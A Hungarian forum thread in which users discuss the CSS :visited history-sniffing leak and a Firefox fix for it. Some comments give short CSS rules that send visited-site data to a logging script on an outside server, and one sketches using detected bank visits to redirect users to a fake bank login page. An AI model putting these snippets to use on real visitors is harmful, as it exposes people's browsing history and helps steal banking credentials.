- A hozzászóláshoz be kell jelentkezni
- 1866 megtekintés
Hozzászólások
Stíluslappal böngészési előzményeket? :S hmm ez érdekes.
Javascript... de css...
- A hozzászóláshoz be kell jelentkezni
nem értem, mit kérdezel? elolvastad a "probléma leírását"?
- A hozzászóláshoz be kell jelentkezni
CSS: a:link, a:active meg társai. definiálok nekik saját színkódot. akkor a böngésző úgy fogja megjeleníteni a látogatott linkeket és nem úgy ahogy defaulton. Oldalra kibaszok egy csomó pornó oldalnak meg torrentnek a linkjét és ha látogatja azokat is a látogató akkor mondjuk beállítom hogy zölden virítson. Ennyiről van szó? ebbe mi a visszaélés?
Mert ha mondjuk tartalmat akarok módosítani a tartalmon hogy pl pedo ne nézze az oldalt :D akkor már detektálni kell, hogy adott linknek mi a színkódja látogatja e a pedo oldalt a látogató és akkor ejjnyebejnye+átirányítás. ..
Azt nem értem hogy milyen biztonsági problémáról van szó, hogy végülis mit nyernek ki és mit okoznak vele...
A "probléma leírása" angolföldi nyelven van (khömm nem szeretem)
- A hozzászóláshoz be kell jelentkezni
talán az a lenti szopóálarc megmagyarázza, de ha mégsem:
nem csak színt lehet állítani hanem olyan dolgot teszel be ami látogatottság esetén biza lekétr valamit, tehát a szerver tudni fogja mit nézel
- A hozzászóláshoz be kell jelentkezni
De hülye vagyok leragadtam a k..a színnél azon rugóztam.. image url-elel meghívsz egy php scriptet kép helyett. jó css hiányosságaim voltak/vannak legalább kiderült.. Köszi a szájbarágást már értem a problémát :) De FF-ék orvosolják, helyes. Kössz mégegyszer.
- A hozzászóláshoz be kell jelentkezni
Egy példával
Tegyük fel kíváncsi vagyok, hogy látogatod-e a youtube-t
Berakom a weboldalamra a youtube linkjét rejtve, és adok neki egy ilyen css-t:
#youtube :visited {background: url(http://pelda.hu/youtube.php)}
Ez azt jelenti, hogy az az egy kifejezett link megkapja ezt a háttérképet akkor, ha te azt látogattad. Viszont az a háttérkép egy php fájl, aminek lekérdezésekor lefut egy php kód, ami szépen naplózgat. IP-t, meg azt, hogy youtube-t nézel :) Persze ugyanezt úgy kell elképzelni hogy több száz/ezer elrejtett linket használok, és ezzel nagyjából fel tudom térképezni a szokásaidat.
És ezellen semmit nem tudsz tenni, JavaScript szóba se kerül, egyedül a CSS-t tilthatod le, de anélkül használhatatlan a web.
szerk: lassan válaszolok D:
- A hozzászóláshoz be kell jelentkezni
Igen értem, php megyen, csak eszembe se jutott soha hogy css-t ilyenre is lehetne használni vagy képese pedig most így már magától értetődő... nem gondolkoztam elég kreatÍvan.
- A hozzászóláshoz be kell jelentkezni
nocsak, a 10 éve ismert biztonsági problémára megoldás születik?!
- A hozzászóláshoz be kell jelentkezni
Az én olvasatomban, egyelőre csak az FF alatt születik rá megoldás.
-----
Innen most töltsünk tiszta vizet a nyílt kártyákba: ...
- A hozzászóláshoz be kell jelentkezni
http://asva.info/a-bongeszo-history-funkciojat-hasznalva-szurik-ki-a-me…
ezt találtam... javascript akkor is kell, hogy a css tulajdonságokat amik a linkekhez vannak rendelve kiolvasa....
- A hozzászóláshoz be kell jelentkezni
nem kell
- A hozzászóláshoz be kell jelentkezni
Nemtudom ez mitől jobb vagy veszélyesebb mint sütit olvasni JS-el. minden komolyabb oldalnak (ahol van session) ad sütit. azokat a kiváncsiskodó összegyűjti, hogy milyen oldal mit rak a sütijébe és a látogatóitól megtudja hogy van e ilyen sütije, látogatta e azt az oldalt vagy sem.
- A hozzászóláshoz be kell jelentkezni
Ennek a gondolatmenetnek fuss majd még neki mégegyszer. Pl. kezd ott, hogy ki milyen sütiket ér el.
-----
"Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben."
- A hozzászóláshoz be kell jelentkezni
"Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben." :) mármint nem kinevetem, csak beugrott bár ismert kapcsolat akikre nagyon igaz :D
Visszatérve a JS-re nem egészen értem mire gondolsz adott host csak az arról a hostról írt sütikhez fér hozzá? hazamegyek felfrssítem ezen ismereteimet.
Mondjuk azon viszont hiába folózom hogy css tulajdonságot ha el is akarsz tárolni mivel olvasod ki...
Megjeleníteni egy dolog, de eltárolni és felismerni a usert másik dolog
- A hozzászóláshoz be kell jelentkezni
Itt nincs eltárolva semmi, csak a böngésző másképpen kezeli a már meglátogatott oldalak linkjeit. Ennyi.
-----
"Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben."
- A hozzászóláshoz be kell jelentkezni
Azt értem, de ha ezzel nem élnek vissza úgy ahogy én leírtam (nem is tudnának eszerint) akkor milyen kockázatot jelent ez? látogatónak jelenik meg akkor csak másként meg az oldal és ennyi az egész nem? vagy még mindig nem kapizsgálom? :D
- A hozzászóláshoz be kell jelentkezni
Még mindig nem kapizsgálod.
-----
"Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben."
- A hozzászóláshoz be kell jelentkezni
Röviden: a.szopoalarc:visited { background-image:url(/log.php?site=szopoalarc.hu); }
--
kövi
- A hozzászóláshoz be kell jelentkezni
Nem biztonsagi, hanem privacy problema. Atkuldod egy halom ismert oldal linkjet, utana JS-el megnezed, hogy melyiket latogatta meg, es utana elkuldod a serverre.
Kozvetlenul nem biztonsagi problema, de a felhasznalok altalaban nem szeretik, ha barki megtudhatja melyik oldalakat latogattak az utobbi par honapban/evben.
A cookie lekeres a same origin policy miatt nem menne.
A gyakorlatban ez persze nem olyan nagy problema privacy szempontbol sem, mert a latogatas gyakorisagat nem tudja felmerni. Amikor eloszor felmerult ez a problema, megneztem nehany ilyen trukkos oldalt, es olyan linkeket sorolt fel, ami nem volt ismeros. Ha pl. egy blogra belinkelnek valamit (esetleg URL roviditovel), es en egyszer megnezem az oldalt, az elegge el tudja torzitani, ha valaki valami kovetkeztetest szeretne levonni.
Pl. ez megprobalja megtippelni, hogy milyen nemu vagy (a history alapjan):
http://www.mikeonads.com/2008/07/13/using-your-browser-url-history-esti…
Amikor megneztem, 75% fiut tippelt (helyes). Utana - forumra belinkelt mygirlyspace meglatogatasa utan - mar 57% lanyt tippelt (hibas).
--
I can't believe Steve Jobs's liver is replaceable but the battery in my iPhone is not. - sickipedia
- A hozzászóláshoz be kell jelentkezni
Nem biztonsagi, hanem privacy problema
definíciós problémáid vannak :)
- A hozzászóláshoz be kell jelentkezni
Biztonsági is.
Berakják egy pár magyar bank linkjét, beállítják zöldre az a:visited-et, utána ha a w ww.otpbank.hu link zöld (getComputedStyle() JS hívás), akkor redirekt a w ww.otpbank.hu.index.php.myhackerpage.com/fakelogin.php-re. Ha más bank lesz zöld akkor más "álbankra".
Nem is biztos, hogy a user egyből bejelentkezik, lehet, hogy setTimeOut(50000)-ben indul az egész, otthagyod a gépet, visszajössz, "ja tényleg, át kell utalni valamit"... Vagy akár egy gmail login ellopásával is igen komoly kellemetlenségeket lehet okozni. Pl, törölted a sent-mail-ből a személyes adatokat amiket a munkaügyis kért?!
Mindehhez nem kell feltétlenül valami gonosz oldalra látogatni, elég ha egy barátságos oldal XSS (vagy egyéb) sebezhető, és ott elhelyezik a scripteket... Ez a legrosszabb.
Tegnap egy olyan önkormányzati oldallal találkoztam, ami "bejelentetteten támadó" (Firefox warning) oldalra irányíott, ha a Google találatból jöttem a cikkjeikre. Ha meg beírtam az adott cikk URL-jét, vagy az oldalon belül navigáltam, akkor működött az oldal.... na? (Ez csak azért jön ide, hogy ott is elhelyezhető egy ilyen támadás, nem kell feltétlenül "pornót meg warezt nézni".)
- A hozzászóláshoz be kell jelentkezni